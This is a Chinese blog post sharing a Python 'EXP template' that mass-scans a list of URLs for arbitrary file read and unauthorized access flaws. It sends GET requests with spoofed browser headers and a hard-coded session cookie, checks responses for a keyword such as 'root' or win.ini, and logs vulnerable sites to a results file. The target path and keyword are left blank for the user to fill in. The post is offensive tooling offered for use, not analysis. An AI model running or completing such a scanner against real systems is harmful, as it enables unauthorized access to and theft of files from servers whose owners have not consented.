任意文件读取、未授权访问及信息泄露GET型EXP模版
站长 • 2024-02-29 11:19 • 131 次点击 • 技术文章
import requests
import argparse
from datetime import datetime
import time
import re
requests.packages.urllib3.disable_warnings()
RED_BOLD = "\033[1;31m"
RESET = "\033[0m"
def usage():
global RED_BOLD
global RESET
text = '''
使用方法:
单个 python3 任意文件读取+未授权.py -u url[例 http://127.0.0.1:8080]
批量 python3 任意文件读取+未授权.py -f filename
开始检测................................
'''
print(f"{RED_BOLD}{text}{RESET}")
# proxies = {'http':'http://127.0.0.1:10808}
def save_file(url):
with open('result.txt',mode='a',encoding='utf-8') as f:
f.write(url+'\n')
def poc(check_url,flag):
global num
now_poc = datetime.now()
global RED_BOLD
global RESET
url1 = check_url + "" # 未授权和任意文件读取目录1
# url2 = check_url + "" # 未授权和任意文件读取目录目录2
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cookie': 'language=zh; style=1; EnableAESLogin=0; maintitle=%u4E3B%u52A8%u5B89%u5168%u76D1%u63A7%u4E91%u5E73%u53F0; isPolice=0; name=value; JSESSIONID=FFA216A30B39FD49BA0613D4DC7C6A4D'
}
try:
response1 = requests.get(url1, headers=headers,timeout=5,verify=False)
# response2 = requests.get(url2, headers=headers,timeout=5,verify=False)
if response1.status_code == 200 and "" in response1.text: # 引号中补充关键字,比如root win.ini
print(f'{RED_BOLD}[+]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\tvocal出货了!{RESET}')
print(url1)
num += 1
print("挖到"+ str(num) +"个了")
save_file(url1)
# elif response2.status_code == 200 and "root" in response2.text:
# print(f'{RED_BOLD}[+]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t6a!{RESET}')
# print(url2)
# num += 1
# print("挖到"+ str(num) +"个了")
# save_file(url2)
else:
print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\t没洞,泥煤的这谁顶得住啊!')
except Exception as e:
print(f'[-]{now_poc.strftime("%Y-%m-%d %H:%M:%S")}\t{check_url}\tVocal,死站!')
def run(filepath):
global num
num = 0
flag = 0
urls = [x.strip() for x in open(filepath, "r").readlines()]
for u in urls:
if 'http' in u:
url = u
elif 'https' in u:
url = u
else:
url = 'http://' + u
poc(url,flag)
def main():
parse = argparse.ArgumentParser()
parse.add_argument("-u", "--url", help="任意文件读取+未授权 -u url")
parse.add_argument("-f", "--file", help="任意文件读取+未授权 -f file")
args = parse.parse_args()
url = args.url
filepath = args.file
usage()
time.sleep(1)
if url is not None and filepath is None:
flag = 1
poc(url,flag)
elif url is None and filepath is not None:
run(filepath)
else:
usage()
if __name__ == '__main__':
main()
推荐阅读:
扫描二维码,在手机上阅读
收藏